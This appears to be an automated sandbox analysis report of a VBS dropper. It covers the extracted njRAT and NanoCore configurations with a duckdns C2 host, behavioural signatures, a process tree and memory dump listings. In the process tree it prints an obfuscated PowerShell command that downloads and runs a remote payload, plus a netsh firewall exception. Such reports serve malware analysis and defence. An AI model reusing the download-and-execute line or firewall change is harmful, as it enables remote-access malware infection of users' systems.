Analysis
-
max time kernel
157s -
max time network
156s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
30-11-2021 18:39
General
-
Target
V2N1M2_P.VBS
-
Size
556B
-
MD5
d720ecdccd82525a211f09cfefcee6ee
-
SHA1
f415e9c1a072bdd44f54edabfe5c57f39f71fb0c
-
SHA256
2c882065daea3d83e4ccadf5ce780f33b571ec1799691d0355c4c5a0c98dadc0
-
SHA512
1a18293a40e66e9efefb455577b819f83a33c6aa33e953b124130cc3d443658a501ece61edd18b2524224e053dba4dbe596c4ebf656943611b3e97b317770dd0
Score
10/10
Malware Config
Extracted
Family
njrat
Version
1.9
Botnet
HacKed
Mutex
Microsoft.Exe
Attributes
-
reg_key
Microsoft.Exe
Extracted
Family
nanocore
Version
1.2.2.0
C2
nov20126746.duckdns.org:6746
Mutex
485093d2-0062-43bc-abc8-c9bc4833e7f5
Attributes
-
activate_away_mode
true
-
backup_connection_host
nov20126746.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-09-11T03:46:06.827058436Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
6746
-
default_group
nov 20021
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
485093d2-0062-43bc-abc8-c9bc4833e7f5
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
nov20126746.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
-
BitRAT Payload 3 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\V2N1M2_P.VBS"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ChiptEch=('{2}{1}{0}{3}{4}' -f'bC','WE','NEt.','liE','nt'); $FrEq=('{3}{0}{1}{2}' -f'load','Str','ing','Down'); $sysinfo=('{2}{0}{1}' -f'E','X','I'); &('I'+'EX')(N`Ew-Ob`jE`ct $ChiptEch).$FrEq('https://transfer.sh/get/oQmtoM/byyypass.txt')2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/708-146-0x000000000040BBCE-mapping.dmp
-
memory/708-186-0x0000000004F60000-0x000000000545E000-memory.dmpFilesize
5.0MB
-
memory/708-155-0x0000000004E00000-0x0000000004E01000-memory.dmpFilesize
4KB
-
memory/708-145-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1228-170-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1228-166-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1228-164-0x00000000007E2730-mapping.dmp
-
memory/1228-163-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1260-173-0x00000000065A0000-0x00000000065B5000-memory.dmpFilesize
84KB
-
memory/1260-154-0x0000000005340000-0x0000000005341000-memory.dmpFilesize
4KB
-
memory/1260-185-0x0000000006880000-0x0000000006881000-memory.dmpFilesize
4KB
-
memory/1260-174-0x00000000065E0000-0x00000000065E6000-memory.dmpFilesize
24KB
-
memory/1260-183-0x00000000066B0000-0x00000000066BF000-memory.dmpFilesize
60KB
-
memory/1260-182-0x0000000006670000-0x0000000006699000-memory.dmpFilesize
164KB
-
memory/1260-181-0x0000000006660000-0x000000000666A000-memory.dmpFilesize
40KB
-
memory/1260-180-0x0000000006640000-0x000000000664F000-memory.dmpFilesize
60KB
-
memory/1260-150-0x000000000041E792-mapping.dmp
-
memory/1260-149-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/1260-179-0x0000000006630000-0x0000000006632000-memory.dmpFilesize
8KB
-
memory/1260-172-0x0000000006590000-0x000000000659D000-memory.dmpFilesize
52KB
-
memory/1260-157-0x0000000004F20000-0x0000000004F21000-memory.dmpFilesize
4KB
-
memory/1260-160-0x0000000004E40000-0x000000000533E000-memory.dmpFilesize
5.0MB
-
memory/1260-161-0x0000000004FC0000-0x0000000004FC1000-memory.dmpFilesize
4KB
-
memory/1260-178-0x0000000006620000-0x000000000662D000-memory.dmpFilesize
52KB
-
memory/1260-177-0x0000000006610000-0x0000000006617000-memory.dmpFilesize
28KB
-
memory/1260-165-0x0000000005040000-0x0000000005045000-memory.dmpFilesize
20KB
-
memory/1260-176-0x0000000006600000-0x0000000006606000-memory.dmpFilesize
24KB
-
memory/1260-175-0x00000000065F0000-0x00000000065FC000-memory.dmpFilesize
48KB
-
memory/1260-168-0x0000000005BF0000-0x0000000005C09000-memory.dmpFilesize
100KB
-
memory/1260-169-0x0000000005210000-0x0000000005213000-memory.dmpFilesize
12KB
-
memory/1260-171-0x0000000004E40000-0x000000000533E000-memory.dmpFilesize
5.0MB
-
memory/1648-184-0x0000000000000000-mapping.dmp
-
memory/3036-124-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-118-0x0000000000000000-mapping.dmp
-
memory/3036-119-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-167-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-121-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-122-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-123-0x00000155C2260000-0x00000155C2261000-memory.dmpFilesize
4KB
-
memory/3036-127-0x00000155C2323000-0x00000155C2325000-memory.dmpFilesize
8KB
-
memory/3036-125-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-126-0x00000155C2320000-0x00000155C2322000-memory.dmpFilesize
8KB
-
memory/3036-144-0x00000155C22C0000-0x00000155C22C4000-memory.dmpFilesize
16KB
-
memory/3036-133-0x00000155C2326000-0x00000155C2328000-memory.dmpFilesize
8KB
-
memory/3036-129-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB
-
memory/3036-128-0x00000155C2430000-0x00000155C2431000-memory.dmpFilesize
4KB
-
memory/3036-120-0x00000155A9C30000-0x00000155A9C32000-memory.dmpFilesize
8KB